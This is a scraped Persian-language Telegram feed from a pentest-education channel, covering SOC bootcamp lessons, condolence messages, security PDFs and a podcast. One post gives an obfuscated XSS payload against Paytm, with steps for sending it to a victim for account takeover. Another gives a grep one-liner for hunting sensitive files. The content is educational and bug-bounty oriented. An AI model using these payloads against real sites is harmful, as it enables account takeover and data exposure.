Try Hack Box
6.14K subscribers
696 photos
65 videos
129 files
708 links
1 Nov 2020
1399/08/11
آموزش تست نفوذ و ردتیم

https://linkedin.com/company/tryhackbox-org/

یوتیوب
https://youtube.com/@tryhackbox

کانال ها :
@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( اخبار و داستانهای هک )
پشتیبانی : @ThbxSupport
Download Telegram
🟠 در این قسمت سرفصل‌های کلیدی زیر رو بررسی کردیم:

- کلمات و اصطلاحات
- چیستی مرکز عملیات امنیت
- کار ها و وظایف در SOC
- مدل های کارکردن و جریان کاری در SOC
- نحوه بالا بردن مهارت در SOC

این مباحث پایه‌ای، شما را برای ورود به دنیای امنیت سایبری آماده می‌کند.


@TryHackBox

#SOC #امنیت_سایبری #بوتکمپ_SOC
16👍3🤔2👎1
پس از روزهایی پر از التهاب و سکوت، دوباره به فضای مجازی برگشتیم. کاش حال همگی‌ مان خوب باشد، اگرچه می‌دانیم چه بر ما گذشت. ما سطر به سطرِ کتابی را زندگی کردیم که خواندنش فقط اشک است و بغض.
تسلیت به تمام هم‌وطنانی که در این چند روز سیاه، به سوگ عزیزانشان نشستند.

‏ما روزهایی رو گذروندیم که اگر کتاب بشه آدم‌های زیادی رو به گریه میندازه .

تسلیت به همه کسایی که این چند روزه داغ عزیز دیدن  🖤

از طرف مجموعه TryHackBox
32🕊14👍3🍾1
دوستان این روزها کسی دل و دماغ کاری رو نداره حتی خود شما با شرایط پیش اومده .

دوستان اگر سوالی یا حرفی سخنی دارید با ما در ارتباط باشید :
@ThbxSupport
19🕊5👎4🎃2❤‍🔥1🍾1
🖤 با عرض تسلیت مجدد به تمامی خانواده‌های داغدار ایران، امیدوارم ما را در این داغ شریک بدانید. 🥀

⚫️ درود ! امیدوارم که حال همه‌مان هرچند در این لحظه دشوار، به تدریج بهتر شود.

وضعیت اینترنت همان‌طور که می‌دانید، ناپایدار است و آینده‌اش نیز نامشخص به نظر می‌رسد. در این شرایط، ما با دلی اندوهگین تصمیم داریم بر روی محتوا تمرکز کنیم تا بتوانیم کمی از این فضای غم‌انگیز فاصله بگیریم و از فروپاشی روحی جلوگیری کنیم. با اینکه در این مدت تمایل چندانی به فعالیت نداشتم، اما معتقدم که انسانیت و احترام به یاد عزیزانی که دیگر در میان ما نیستند، از هر تخصصی مهم‌تر است.🕊

امروز که سی روز از فقدان این عزیزان است، بر خود لازم می‌دانیم که فعالیت‌های خود را آغاز کنیم. با وجود اینکه بسیاری از افراد هنوز نتوانسته‌اند به اینترنت متصل شوند، ما به یاد کسانی که دیگر در کنار ما نیستند، از ایموجی های 🥀 🖤 🕊 استفاده خواهیم کرد و از شما نیز دعوت می‌کنیم در مطالب خود از این ایموجی ها بهره ببرید و در ریکشن ها در کانال از 🕊 استفاده کنید .

به امید روزی که دیگر شاهد چنین حوادث تلخی در کشور عزیزمان ایران نباشیم و بتوانیم با همدلی و همبستگی، آینده‌ای روشن‌تر بسازیم.🥀🖤🕊

🥀 جهان یادگار است و ما رفتنی
🥀به گیتی نماند به جز مردمی


با احترام و همدردی 🖤🥀🕊
از طرف مجموعه TryHackBox
🕊3715🔥4🤔4👍1🤩1
Try Hack Box
🚀 قسمت اول بوتکمپ SOC 0x4131! 🔗 Youtube: https://youtu.be/-lwI1ifaIXQ
🚀 قسمت دوم بوتکمپ SOC 0x4131!

در این قسمت، با مفاهیم شبکه سر و کله زدیم : 
- مدل های مفهومی نتورک در عمل ما باهاشون چطور برخورد میکنیم
- پروتکل های مهم و کمک کننده چیا هستن
- مکانیزم های آدرس دهی در شبکه چیست

با بررسی این مباحث آماده میشیم که در ماژول بعد با network attack ها آشنا بشیم و تهدیدات رو شناسایی کنیم
از جلسه بعد از روند مفهوم و تئوری خارج می شویم و به سمت case study و task های SOC میریم

برای دانلود پی دی اف ارائه شده میتوانید به گیتهاب این بوتکمپ مراجعه کنید :
https://github.com/XaocZenon/SOC-0x4131

🔗 Youtube:
https://youtu.be/mumH5WWF2jM


👉 قسمت‌های بعدی رو هم پیگیری کنید ! 💪 #SOC #امنیت_سایبری #بوتکمپ_SOC

@TryHackBox
🕊54👍3
داستان خودتونو تعریف کنید ! 🕊 چگونه بخشی از جامعه TryHackBox شدید یا در آن چه چیزی پیدا کردید؟🥀 شاید محتوای کانال توانسته براتون تغییری ایجاد کنه یا در چیزی کمکتون کرده باشه؟🖤

🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور کلی موضوع امنیت اطلاعات داری ؟

🖤 در کامنت‌ها بنویسید! هر آنچه احساس میکنید و لازم میدانید را به اشتراک بگذارید درباره ی ما .

🖤🕊🥀🖤🕊🥀🖤🕊🥀🖤🕊🥀
#صحبت
8🕊6👨‍💻2😢1
🔥 فایل‌ های حساس روی وب سرور را شناسایی میکند.
cat allurls.txt | grep -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5"

تجربت کامنت کن


@TryHackBox
#باگ_بانتی
9🕊3🌚1
Session Fixation and Hijacking(fa).pdf
1.2 MB
آموزش
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم

✍️نویسنده
🥀 @TryHackBox | The Chaos
🔥5🕊4👍3👌1
با کمال احترام، مراسم چهلم عزیزان از دست رفته را به دوستان، خانواده و آشنایان آنها تسلیت می‌گوییم. در این روزهای سخت، ما را در غم خود شریک بدانید. 🕊🖤🥀

دوستان ۲۷ و ۲۸ چهلم عزیزان از دست رفته هست ولی به دلیل فعالیت ، گفتم یادم نشه تسلیت رو عرض کنیم .🖤🕊

با آرزوی صبر و آرامش برای شما

تیم TryHackBox
29🫡14🕊5👎1
Cross-site Scripting and HTML Injection .pdf
1.1 MB
📖 XSS & HTML Injection 🥀

🕊 @TryHackBox
👍7🕊1
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :


💠 کانال های تلگرام ما :

🔶 آموزش تست نفوذ و Red Team
🆔
@TryHackBox

🔶 رودمپ های مختلف
🆔
@TryHackBoxOfficial

🔶 داستان های هک
🆔
@TryHackBoxStory

🔶 آموزش برنامه نویسی
🆔
@TryCodeBox

🔶 رادیو زیروپاد ( پادکست ها )
🆔
@RadioZeroPod


👥 گروه های پرسش و پاسخ

🔷 هک و امنیت
🆔
@TryHackBoxGroup
🔷 برنامه نویسی
🆔
@TryCodeBoxGroup


🔴 اینستاگرام :
🔗
http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗
https://youtube.com/@tryhackbox

🟠 گیت هاب ما :
🔗
https://github.com/TryHackBox/

🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
5
۷ هک اصلی ترمینال که سرعت کارت را چند برابر می‌کند 🔥
بیشتر کاربران در کنسول کند کار می‌کنند، چون قابلیت‌های پایه را نمی‌شناسند. ساعت‌ها وقت صرف جست‌وجوهای بیهوده و کارهای تکراری می‌شود، در حالی که همان کار را می‌توان با چند دستور ساده انجام داد. این‌ها ابزارهایی هستند که همین امروز سرعت کارت را به‌طور محسوسی افزایش می‌دهند.

ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq

دوستان ما را در لینکدین دنبال کنید

🥀 @TryHackBox
5🕊2
🎙 قسمت سوم RadioZeroPod |  داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی


🕊 داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...

🥀 این پادکست درباره نفوذ فیزیکی به یکی از بانک‌های لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!

🕊 • کل داستان مجموعه‌ای از واقعیت‌ها است که با نظرات شخصی او از سخنرانی‌ها، مصاحبه‌ها و گفت‌وگوهای پشت صحنه ترکیب شده است. اگر علاقه‌مندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده پادکست را گوش بدید و نظراتتون رو بگید .

💠  https://youtu.be/g_Q3jy5yamc


🆔 @TryHackBox
🆔
@TryHackBoxOfficial
🆔
@TryHackBoxStory
🆔
@TryCodeBox
🆔
@RadioZeroPod
6👍2
🕊 دراپ کردن یه پچ XSS اخیر در Paytm!

👀 مراحل :
1. پیلود رو در search box وارد کن.
2. URL رو کپی کن.
3. به victim بفرست.
4. takeover حساب با یک کلیک!!

پیلود :

<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>


🥀 @TryHackBox
#باگ_بانتی #xss
5
همکاری در زمینه تدریس، تولید محتوا و پادکست

ما به دنبال دوستانی هستیم که علاقه‌مند به تدریس، تولید محتوا، ترجمه و همچنین فعالیت در حوزه پادکست هستند. اگر شما نیز تمایل به همکاری در این زمینه‌ها دارید، خوشحال می‌شویم که با شما ارتباط برقرار کنیم.

برای کسب اطلاعات بیشتر و جزئیات همکاری، لطفاً پیام بفرستید:
@THBxSupport
🕊27 و 28 و 29 بهمن چهلم عزیزانیه که خیلی زودتر از رویاهاشون به ناحق خاموش شدن..

از رفتـنِ لاله‌هـــــا، چهـــل روز گذشت
بـا داغ جوانـــــانِ دل‌افــــروز گذشت

دردا، که به جــایِ وصــل، دوراِنِ فــراق
بگذشت به ما و سخت جانسـوز گذشت!

چهل روز گذشت. چهل سالم بگذره داغشون فراموش نخواهد شد،،،به یادشان که در جسمشان در بین ما نیست ولی روحشان چراغ راه آینده ایران شد🕊🌹🫡

🥀 یادشون گرامی و نامشون جاودان 🖤

از طرف تیم TryHackBox 🥀
🕊2710👎1😍1💯1🍾1
معرفی تیم TryHackBox به اعضای محترم کانال

درود به همه شما عزیزان!

در تیم TryHackBox، ما به آموزش و یادگیری به عنوان یک سفر هیجان‌انگیز نگاه می‌کنیم، نه صرفاً یک مقصد. برخلاف بسیاری از اکادمی‌ های موجود، هدف ما این است که به شما کمک کنیم تا درک عمیق‌تری از علم و مهارت‌های مورد نیاز در دنیای فناوری اطلاعات پیدا کنید.

ما معتقدیم که دوره‌های آموزشی می‌توانند نقطه شروع خوبی باشند، اما این تنها آغاز راه است. ما شما را تشویق می‌کنیم تا فراتر از محتوای دوره‌ها فکر کنید و خود را به چالش بکشید. ما دوست داریم هر یک از شما به یک جویای علم تبدیل شوید؛ کسی که با اشتیاق به دنبال کشف و یادگیری است و همواره در پی به‌روز کردن مهارت‌های خود می‌باشد.

تیم ما متشکل از افراد با تجربه در زمینه‌های مختلف امنیت سایبری و فناوری اطلاعات است که با عشق و علاقه، دانش خود را به شما منتقل می‌کنند. ما با ارائه محتوای آموزشی کاربردی و چالش‌های واقعی، به شما کمک خواهیم کرد تا در دنیای پیچیده فناوری به یک متخصص واقعی تبدیل شوید.

صرفاً تدریس یک دوره یا چند دوره و دریافت وجه از دانشجو کافی نیست. هدف ما این است که دانشجو واقعاً بفهمد علم فراتر از چارچوب چند دوره محدود است. این دوره تا حدی به او کمک می‌کند، اما پس از آن او باید با انگیزه و کنجکاوی پژوهشی به یادگیری مستقل ادامه دهد و جویای علم شود.
به جمع ما بپیوندید و با هم به سمت آینده‌ای روشن‌تر برای کشورمان در دنیای امنیت سایبری حرکت کنیم!



اگر مایل به عضویت در تیم ما هستید، لطفاً با آیدی زیر در ارتباط باشید:
@ThbxSupport

با آرزوی موفقیت برای همه شما!
6
Network_Security_VAPT_Checklist.pdf
151.6 KB
🔖 چک‌ لیست VAPT امنیت شبکه

🥀 @TryHackBox
#Checklist
9